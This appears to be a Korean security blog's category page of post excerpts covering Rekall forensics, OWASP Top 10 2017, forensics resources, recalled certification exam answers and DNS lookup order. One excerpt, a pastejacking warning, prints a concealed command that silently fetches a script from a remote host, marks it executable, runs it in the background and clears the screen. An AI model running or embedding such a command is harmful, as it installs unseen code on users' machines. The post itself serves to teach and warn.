본문 바로가기

보안 & 해킹/정보 보안

Rekall info Command Provider Class Docs -------------------- -------------------- -------------------------------------------------- ELFPlugins Baseclass for all ELF plugins. BaseSessionCommand Base class for all session management plugins. address_resolver DarwinAddressResolve A Darwin specific address resolver plugin. r address_resolver WindowsAddressResolv A windows specific address resolver plugin. er a..
OWASP Top 10 2017년 영문, 한국어 버전 발표 OWASP Top 10 2017년 영문, 한국어 버전이 드디어 발표되었습니다. 본래 3년을 주기로 하여 2016년에 발표될 예정이었지만 수차례 연기되었었네요. 아래 한글과 영문버전을 첨부합니다. 2017년 초에도 RC(Release Candidate)버전이 나왔었는데 이번에 수정되었으므로 2017 최신 버전을 보는것이 좋습니다. 아래 파일을 받으세요.
포렌식 공부를 위한 자료 페이스북 모의침투 연구회에서 매번 같은 질문이 올라와서 이참에 정리해둔다. Storage media acquisitionStorage media analysis and reportingWindows Evidence CollectionData recoveryPassword recoveryNetwork forensicMemory forensicMobile forensic 링크https://www.digi77.com/the-little-secret-on-digital-forensics/ 링크http://www.yes24.com/24/goods/38136197?scode=032&OzSrank=10 링크http://www.deftlinux.net/download/ 링크http://forensic-proof.com..
정보보안기사 실기 10회 기출 복원 기출 복원입니다. 가답안이니 틀렸을 경우 댓글로 알려주세요~^^ 1. TCP 포트가 닫혀 있을 때 응답이 오는 스텔스 스캔 3가지NULL Scan, FIN Scan, Xmas Scan 2. FTP 동작 방식에 대한 지문에 대한 빈칸 채우기FTP는 ( A ) 모드와 수동(passive)모드가 있다.( A )는 통신 제어를 위한 ( B ) 포트와 데이터 전송을 위한 ( C ) 포트를 사용한다.수동모드에서는 데이터 전송을 위해 서버에서 ( D ) 포트 이상을 사용한다. A: ActiveB: 21C: 20D: 1024 3. 오픈 소스 도구인 PacketFense와 같이 네트워크 통제(이외에도 기다란 설명이 있음) 등을 수행하는 보안솔루션은? NAC 4. VLAN의 목적에 대한 질문.VLAN은 네트워크 자원 사용..
[해킹] 모르면 당한다 2탄. 복사, 붙여넣기만 해도 악성코드에 감염되는 Pastejacking! /var/www/html/harmless 코드입니다. 사실 많이 해롭습니다. git clone /dev/null; clear; wget http://192.168.10.21/badcode.py -O /tmp/badcode.py &>/dev/null && chmod +x /tmp/badcode.py && /tmp/badcode.py & disown && clear git clone https://github.com/LionSec/katoolin.git /var/www/badcode.py 는 개인에 맞게 커스터마이징하여 만든 코드이기 때문에 새로 직접 작성하셔야 합니다.
정보통신망 이용촉진 및 정보보호 등에 관한 법률(개인정보) [시행 2017.3.23.] [법률 제14080호, 2016.3.22., 일부개정] 국문 다운로드 받기https://www.i-privacy.kr/jsp/user4/intro/law2.jsp
정보보안기사 실기 9회 기출 복원 시험 보시느라 수고하셨습니다. 정답은 굵은 글씨로 표시했습니다. 잘못된 내용은 댓글로 알려주세요. 1. 맥, 리눅스, 유닉스,윈도우등 운영체제 별로 디렉터리 경로는 다르지만 DNS의 정보를 담고 있는 파일이며, 윈도우7이상 버전에서는 관리자 외에 수정이 불가능 한 파일의 이름은 무엇인가? - hosts 2. smurf 문제, 공격자가 희생자의 IP 로 위조하여 ICMP (A)Echo request 를 Broadcast 한다.희생자들은 (B)Echo reply 한다. (C) Broadcast 방법 3. (A)스택 영역에 할당된 버퍼의 크기를 초과하는 데이터나 실행가능 코드를 넣어 특정 변수나 복귀주소를 변경하여 임의의 코드를 실행하는 것이다. (B)힙 영역에서 버퍼를 초과 4. trustwave 사의 아파..
윈도우와 리눅스에서의 DNS 질의 과정 및 우선순위 총정리 윈도우와 리눅스시스템에서 DNS 질의 과정과 우선순위를 총정리해봤습니다.빠트리거나 틀린 내용이 있으면 알려주세요. 인터넷 어딜 찾아봐도 한방에 정리된게 없네요.... 순서의 기준은 'spoofing등의 비정상적인 행위를 제외하고 패키지 설치, 설정 수정, 추가서버 등을 설치하여 질의 순서를 설정할 수 있다'는 기준입니다. 숫자가 커질수록 나중에 탐색하고 동작하는 순위가 밀립니다. DNS 질의 과정중 단 한부분이라도 해킹이나 수정된다면 파밍에 당할 수 있음을 생각하며... 윈도우에서의 DNS 질의 과정과 우선순위 1. DNS cache에 질의. - 해당 dns cache는 ipconfig /displaydns 명령어로 볼 수 있음. 주로 자동으로 캐시가 생성됨. 2. C:\windows\system32\d..